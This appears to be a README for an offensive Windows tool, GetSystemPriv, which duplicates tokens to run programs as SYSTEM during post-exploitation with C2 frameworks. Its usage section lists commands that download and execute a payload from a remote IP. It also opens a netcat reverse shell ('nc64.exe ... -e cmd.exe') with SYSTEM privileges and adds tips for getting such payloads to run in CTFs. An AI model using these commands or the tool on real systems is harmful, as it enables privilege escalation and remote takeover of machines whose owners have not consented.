Application for token duplication running chosen local executable file or by downloading one from given URL. I'm a big fan of running getsystem while using Meterpreter and seeing SYSTEM context in the list of sessions, but it kind of annoys me when I don't have it using Havoc or any other C2. That's why I created GetSystemPriv.
This project is based on TokenDuplicator by Magnus Stubman.
Local file execution:
GetSystemPriv.exe local C:\Users\test\Desktop\msf.exe
Remote file execution:
GetSystemPriv.exe net http://10.10.14.15/msf.exe
File will be downloaded to the temporary path based on user directory and immediately deleted once the process is closed.
Command execution:
GetSystemPriv.exe cmd "C:\Windows\Tasks\nc64.exe 192.168.0.122 4444 -e cmd.exe"
Remember to pass the full path of the executables in the command. CreateProcessWithTokenW is failing in cmd mode if the parameters to the application are too long. If you're doing CTF and using base64ed powershell oneliner, it may not execute and your best bet is to upload nc.exe and work it from there.
